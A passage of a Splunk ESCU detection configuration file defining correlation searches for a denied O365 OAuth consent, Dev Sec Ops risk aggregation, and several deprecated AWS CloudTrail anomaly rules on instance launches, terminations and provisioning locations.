dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 User Consent Denied for OAuth Application - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 100, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies instances where a user has actively denied consent to an OAuth application seeking permissions within the Office 365 environment. This suggests that the user either recognized something suspicious about the application or chose not to grant it the requested permissions for other reasons. This detection leverages the O365 audit logs, specifically focusing on events related to user consent actions. By filtering for denied consent actions associated with OAuth applications, the analytic captures instances where users have actively rejected permission requests. While user-denied consents can be routine, they can also be indicative of users spotting potentially suspicious or unfamiliar applications. By monitoring these denied consent attempts, security teams can gain insights into applications that might be perceived as risky or untrusted by users. It can also serve as a feedback loop for security awareness training, indicating that users are being cautious about granting permissions. If the detection is a true positive, it indicates that a user has actively prevented an OAuth application from gaining the permissions it requested. While this is a proactive security measure on the user's part, it's essential for security teams to review the context of the denial. Understanding why certain applications are being denied can help in refining application whitelisting policies and ensuring that no malicious applications are attempting to gain access. action.notable.param.rule_title = O365 User Consent Denied for OAuth Application action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_graph` status.errorCode=65004 | rename userPrincipalName as user | rename ipAddress as src_ip | stats max(_time) as lastTime by user src_ip appDisplayName status.failureReason | `security_content_ctime(lastTime)` | `o365_user_consent_denied_for_oauth_application_filter` [ESCU - Risk Rule for Dev Sec Ops by Repository - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects by correlating repository and risk score to identify patterns and trends in the data based on the level of risk associated. The analytic adds any null values and calculates the sum of the risk scores for each detection. Then, the analytic captures the source and user information for each detection and sorts the results in ascending order based on the risk score. Finally, the analytic filters the detections with a risk score below 80 and focuses only on high-risk detections.This detection is important because it provides valuable insights into the distribution of high-risk activities across different repositories. It also identifies the most vulnerable repositories that are frequently targeted by potential threats. Additionally, it proactively detects and responds to potential threats, thereby minimizing the impact of attacks and safeguarding critical assets. Finally, it provides a comprehensive view of the risk landscape and helps to make informed decisions to protect the organization's data and infrastructure. False positives might occur so it is important to identify the impact of the attack and prioritize response and mitigation efforts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} action.escu.data_models = ["Risk"] action.escu.eli5 = The following analytic detects by correlating repository and risk score to identify patterns and trends in the data based on the level of risk associated. The analytic adds any null values and calculates the sum of the risk scores for each detection. Then, the analytic captures the source and user information for each detection and sorts the results in ascending order based on the risk score. Finally, the analytic filters the detections with a risk score below 80 and focuses only on high-risk detections.This detection is important because it provides valuable insights into the distribution of high-risk activities across different repositories. It also identifies the most vulnerable repositories that are frequently targeted by potential threats. Additionally, it proactively detects and responds to potential threats, thereby minimizing the impact of attacks and safeguarding critical assets. Finally, it provides a comprehensive view of the risk landscape and helps to make informed decisions to protect the organization's data and infrastructure. False positives might occur so it is important to identify the impact of the attack and prioritize response and mitigation efforts. action.escu.how_to_implement = Ensure that all relevant detections in the Dev Sec Ops analytic stories are enabled and are configured to create risk events in Enterprise Security. action.escu.known_false_positives = Unknown action.escu.creation_date = 2023-10-27 action.escu.modification_date = 2023-10-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Risk Rule for Dev Sec Ops by Repository - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Dev Sec Ops"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - RIR - Risk Rule for Dev Sec Ops by Repository - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 10"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects by correlating repository and risk score to identify patterns and trends in the data based on the level of risk associated. The analytic adds any null values and calculates the sum of the risk scores for each detection. Then, the analytic captures the source and user information for each detection and sorts the results in ascending order based on the risk score. Finally, the analytic filters the detections with a risk score below 80 and focuses only on high-risk detections.This detection is important because it provides valuable insights into the distribution of high-risk activities across different repositories. It also identifies the most vulnerable repositories that are frequently targeted by potential threats. Additionally, it proactively detects and responds to potential threats, thereby minimizing the impact of attacks and safeguarding critical assets. Finally, it provides a comprehensive view of the risk landscape and helps to make informed decisions to protect the organization's data and infrastructure. False positives might occur so it is important to identify the impact of the attack and prioritize response and mitigation efforts. action.notable.param.rule_title = RBA: Risk Rule for Dev Sec Ops by Repository action.notable.param.security_domain = cloud action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as sum_risk_score, values(All_Risk.annotations.mitre_attack.mitre_tactic) as annotations.mitre_attack.mitre_tactic, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where All_Risk.analyticstories="Dev Sec Ops" All_Risk.risk_object_type = "other" by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count > 3 and sum_risk_score > 100 | `risk_rule_for_dev_sec_ops_by_repository_filter` [ESCU - Abnormally High AWS Instances Launched by User - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events where a user successfully launches an abnormally high number of instances. This search is deprecated and have been translated to use the latest Change Datamodel action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events where a user successfully launches an abnormally high number of instances. This search is deprecated and have been translated to use the latest Change Datamodel action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. The threshold value should be tuned to your environment. action.escu.known_false_positives = Many service accounts configured within an AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Abnormally High AWS Instances Launched by User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Cryptomining", "Suspicious AWS EC2 Activities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Abnormally High AWS Instances Launched by User - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Cryptomining", "Suspicious AWS EC2 Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=RunInstances errorCode=success | bucket span=10m _time | stats count AS instances_launched by _time userName | eventstats avg(instances_launched) as total_launched_avg, stdev(instances_launched) as total_launched_stdev | eval threshold_value = 4 | eval isOutlier=if(instances_launched > total_launched_avg+(total_launched_stdev * threshold_value), 1, 0) | search isOutlier=1 AND _time >= relative_time(now(), "-10m@m") | eval num_standard_deviations_away = round(abs(instances_launched - total_launched_avg) / total_launched_stdev, 2) | table _time, userName, instances_launched, num_standard_deviations_away, total_launched_avg, total_launched_stdev | `abnormally_high_aws_instances_launched_by_user_filter` [ESCU - Abnormally High AWS Instances Launched by User - MLTK - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events where a user successfully launches an abnormally high number of instances. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events where a user successfully launches an abnormally high number of instances. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. The threshold value should be tuned to your environment. action.escu.known_false_positives = Many service accounts configured within an AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Abnormally High AWS Instances Launched by User - MLTK - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Cryptomining", "Suspicious AWS EC2 Activities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Abnormally High AWS Instances Launched by User - MLTK - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Cryptomining", "Suspicious AWS EC2 Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=RunInstances errorCode=success `abnormally_high_aws_instances_launched_by_user___mltk_filter` | bucket span=10m _time | stats count as instances_launched by _time src_user | apply ec2_excessive_runinstances_v1 | rename "IsOutlier(instances_launched)" as isOutlier | where isOutlier=1 [ESCU - Abnormally High AWS Instances Terminated by User - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events where an abnormally high number of instances were successfully terminated by a user in a 10-minute window. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events where an abnormally high number of instances were successfully terminated by a user in a 10-minute window. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. action.escu.known_false_positives = Many service accounts configured with your AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify whether this search alerted on a human user. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Abnormally High AWS Instances Terminated by User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Suspicious AWS EC2 Activities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Abnormally High AWS Instances Terminated by User - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS EC2 Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=TerminateInstances errorCode=success | bucket span=10m _time | stats count AS instances_terminated by _time userName | eventstats avg(instances_terminated) as total_terminations_avg, stdev(instances_terminated) as total_terminations_stdev | eval threshold_value = 4 | eval isOutlier=if(instances_terminated > total_terminations_avg+(total_terminations_stdev * threshold_value), 1, 0) | search isOutlier=1 AND _time >= relative_time(now(), "-10m@m")| eval num_standard_deviations_away = round(abs(instances_terminated - total_terminations_avg) / total_terminations_stdev, 2) |table _time, userName, instances_terminated, num_standard_deviations_away, total_terminations_avg, total_terminations_stdev | `abnormally_high_aws_instances_terminated_by_user_filter` [ESCU - Abnormally High AWS Instances Terminated by User - MLTK - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events where a user successfully terminates an abnormally high number of instances. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events where a user successfully terminates an abnormally high number of instances. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. The threshold value should be tuned to your environment. action.escu.known_false_positives = Many service accounts configured within an AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Abnormally High AWS Instances Terminated by User - MLTK - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Suspicious AWS EC2 Activities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Abnormally High AWS Instances Terminated by User - MLTK - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS EC2 Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=TerminateInstances errorCode=success `abnormally_high_aws_instances_terminated_by_user___mltk_filter` | bucket span=10m _time | stats count as instances_terminated by _time src_user | apply ec2_excessive_terminateinstances_v1 | rename "IsOutlier(instances_terminated)" as isOutlier | where isOutlier=1 [ESCU - AWS Cloud Provisioning From Previously Unseen City - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS provisioning activities from previously unseen cities. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS provisioning activities from previously unseen cities. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously Seen AWS Provisioning Activity Sources" support search once to create a history of previously seen locations that have provisioned AWS resources. action.escu.known_false_positives = This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\ This search will fire any time a new city is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your city, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you. action.escu.creation_date = 2018-03-16 action.escu.modification_date = 2018-03-16 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Cloud Provisioning From Previously Unseen City - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Suspicious Provisioning Activities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - AWS Cloud Provisioning From Previously Unseen City - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Suspicious Provisioning Activities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search City=* [search `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search City=* | stats earliest(_time) as firstTime, latest(_time) as lastTime by sourceIPAddress, City, Region, Country | inputlookup append=t previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress, City, Region, Country | outputlookup previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by City | eval newCity=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newCity=1 | table City] | spath output=user userIdentity.arn | rename sourceIPAddress as src_ip | table _time, user, src_ip, City, eventName, errorCode | `aws_cloud_provisioning_from_previously_unseen_city_filter` [ESCU - AWS Cloud Provisioning From Previously Unseen Country - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS provisioning activities from previously unseen countries. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS provisioning activities from previously unseen countries. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously Seen AWS Provisioning Activity Sources" support search once to create a history of previously seen locations that have provisioned AWS resources. action.escu.known_false_positives = This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching over plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\ This search will fire any time a new country is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you. action.escu.creation_date = 2018-03-16 action.escu.modification_date = 2018-03-16 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Cloud Provisioning From Previously Unseen Country - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Suspicious Provisioning Activities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - AWS Cloud Provisioning From Previously Unseen Country - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Suspicious Provisioning Activities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Country=* [search `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Country=* | stats earliest(_time) as firstTime, latest(_time) as lastTime by sourceIPAddress, City, Region, Country | inputlookup append=t previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress, City, Region, Country | outputlookup previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by Country | eval newCountry=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newCountry=1 | table Country] | spath output=user userIdentity.arn | rename sourceIPAddress as src_ip | table _time, user, src_ip, Country, eventName, errorCode | `aws_cloud_provisioning_from_previously_unseen_country_filter` [ESCU - AWS Cloud Provisioning From Previously Unseen IP Address - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS provisioning activities from previously unseen IP addresses. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS provisioning activities from previously unseen IP addresses. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously Seen AWS Provisioning Activity Sources" support search once to create a history of previously seen locations that have provisioned AWS resources. action.escu.known_false_positives = This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\ This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you. action.escu.creation_date = 2018-03-16 action.escu.modification_date = 2018-03-16 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Cloud Provisioning From Previously Unseen IP Address - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Suspicious Provisioning Activities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - AWS Cloud Provisioning From Previously Unseen IP Address - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Suspicious Provisioning Activities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` (eventName=Run* OR eventName=Create*) [search `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Country=* | stats earliest(_time) as firstTime, latest(_time) as lastTime by sourceIPAddress, City, Region, Country | inputlookup append=t previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress, City, Region, Country | outputlookup previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress | eval newIP=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newIP=1 | table sourceIPAddress] | spath output=user userIdentity.arn | rename sourceIPAddress as src_ip | table _time, user, src_ip, eventName, errorCode | `aws_cloud_provisioning_from_previously_unseen_ip_address_filter` [ESCU - AWS Cloud Provisioning From Previously Unseen Region - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS provisioning activities from previously unseen regions. Region in this context is similar to a state in the United States. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS provisioning activities from previously unseen regions. Region in this context is similar to a state in the United States. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously Seen AWS Provisioning Activity Sources" support search once to create a history of previously seen locations that have provisioned AWS resources. action.escu.known_false_positives = This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\ This search will fire any time a new region is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your region, there should be few false positives. If you are located in regions where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you. action.escu.creation_date = 2018-03-16 action.escu.modification_date = 2018-03-16 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Cloud Provisioning From Previously Unseen Region - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Suspicious Provisioning Activities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - AWS Cloud Provisioning From Previously Unseen Region - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Suspicious Provisioning Activities"], "cis20": ["CIS 